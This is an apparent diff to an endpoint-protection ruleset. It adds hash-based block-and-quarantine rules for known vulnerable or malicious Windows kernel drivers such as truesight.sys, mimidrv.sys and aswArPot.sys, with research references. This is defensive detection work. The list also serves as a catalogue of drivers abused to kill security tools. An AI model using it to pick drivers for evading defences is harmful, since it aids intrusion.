+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818013Z",
+ "creation_date": "2026-03-23T11:45:30.818015Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "125e4475a5437634cab529da9ea2ef0f4f65f89fb25a06349d731f283c27d9fe",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57d06bbc-4195-5b6c-9e90-9615a68c7d13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813220Z",
+ "creation_date": "2026-03-23T11:45:31.813223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0d3af81c9f26ffce51b6e32a099327b357b1f16314e27e8c27a814d0d209cc3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57d8a483-9dfc-5c3a-ba16-4c5261b85f25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821744Z",
+ "creation_date": "2026-03-23T11:45:31.821747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65b4d38b9cf698692870ce57820d7fc2e2560722e27b4cc2f24da9e1d1d247d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57e052da-4a12-5cf3-bfe1-231486a223ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150426Z",
+ "creation_date": "2026-03-23T11:45:31.150428Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150434Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fb2513c4a98e8102359a7e97453e0ab8518fad628fba10669d43fdda64acbf9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57eade01-543d-5b23-970c-e0a47db8166c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488310Z",
+ "creation_date": "2026-03-23T11:45:31.488312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488317Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e9e002513b5263e1f8918ed433280a8af2c585c6ea63326f07d08fe355b5eda",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57fb1824-3c0f-5c2d-b6e1-6d8437480fe7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462114Z",
+ "creation_date": "2026-03-23T11:45:30.462117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7956e31c2fcc0a84bcedf30e5f8115f4e74eed58916253a0c05c8be47283c57",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57fc572c-fe03-559e-9268-fe72f2bc5057",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983815Z",
+ "creation_date": "2026-03-23T11:45:29.983817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25a0854ef48a4dfbc7f04e94d2b11757e3613b241d39d46a19cb389ce42887e4",
+ "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5801a5bc-70bd-568c-a495-f291253a4cec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622157Z",
+ "creation_date": "2026-03-23T11:45:29.622159Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622164Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fd788358585e0b863328475898bb4400ed8d478466d1b7f5cc0252671456cc8",
+ "comment": "NamCo vulnerable driver (aka smep_namco.sys) [https://securelist.com/elevation-of-privileges-in-namco-driver/83707/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "580cc271-8a1f-55de-a2c7-7fac586ff885",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470756Z",
+ "creation_date": "2026-03-23T11:45:30.470759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89e579ccbbd834bdd1d5b394843b6110813849000d9116489f14c146cbe66811",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58229230-e4ba-5196-a4be-3b710d4f7f20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816526Z",
+ "creation_date": "2026-03-23T11:45:30.816528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b508921632475b1aadf6194b2f3feea72959b60675dcb44bbc3f8e363f8485ea",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "585874ee-bf20-525b-89a0-8bbb4e2909f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604051Z",
+ "creation_date": "2026-03-23T11:45:29.604054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74f9975737dd078c75048bb01549e7678eb61c065d1f50294b80caeb65cbd65e",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58660078-0ae2-56ec-8fbf-8a2190b749bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830843Z",
+ "creation_date": "2026-03-23T11:45:30.830845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e898abc1a79b301909f5ccf62260a359aa3822b5754b6ab2f1becfda4a4bee12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58667231-93f3-57fe-9a94-7f8c6434d904",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829008Z",
+ "creation_date": "2026-03-23T11:45:30.829010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829016Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6fb583cf195231e5dc14e149541f525b1df8e2c0ee73d7b34d006dd2300b56a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5867df2a-5d7e-5906-b051-bef1bef153dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159366Z",
+ "creation_date": "2026-03-23T11:45:31.159369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfd70d4bb19abf412ac263f80350b604b1ca22bc0e48dd4c29ec9e9808335c3f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58686c4f-caa8-5c43-985b-0bee6f686930",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459077Z",
+ "creation_date": "2026-03-23T11:45:30.459080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fa78c2988f9580b0c18822b117d065fb419f9c476f4cfa43925ba6cd2dffac3",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5871d2ac-e8c4-53fe-97dd-cf961d904783",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971985Z",
+ "creation_date": "2026-03-23T11:45:29.971987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "587e6439-2826-5c81-b5b2-129d5956020b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612180Z",
+ "creation_date": "2026-03-23T11:45:29.612182Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "588d01d8-5a4c-5bd3-b548-99edb5697539",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606777Z",
+ "creation_date": "2026-03-23T11:45:29.606779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606785Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea765eb8845fc90215975814f8da48da787f1a1449d58af0b17cb58d2af5c08e",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58931eaa-aeb4-54b1-a367-dea085972f97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612385Z",
+ "creation_date": "2026-03-23T11:45:29.612387Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55a1535e173c998fbbc978009b02d36ca0c737340d84ac2a8da73dfc2f450ef9",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "589374ed-96af-54bd-bf66-46b49ad60711",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970002Z",
+ "creation_date": "2026-03-23T11:45:29.970004Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e51062d4249945e77c7d3fdecc9797ffc38017465c8068a5f1296bf85ae558c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58ae260e-9338-5f0d-a907-7350e54ee896",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969400Z",
+ "creation_date": "2026-03-23T11:45:29.969402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cd7378c57afa9260976879b58b32433c0e2d52fe0cebe06e647e1165c93f4a8",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58c0fcfd-c5b4-5eb1-9d20-d96187f25676",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145621Z",
+ "creation_date": "2026-03-23T11:45:32.145623Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e99d454a56845bb0e622cfd68b895b7868ef7e8a43424e5b7b803f5a2d25eca",
+ "comment": "Vulnerable Kernel Driver (aka psmounterex.sys) [https://www.loldrivers.io/drivers/0f64bf7a-2ef2-45ea-af7d-4e7c87d98777/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58c32a46-5fd9-5664-b82b-0e9da31d45c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152831Z",
+ "creation_date": "2026-03-23T11:45:31.152834Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
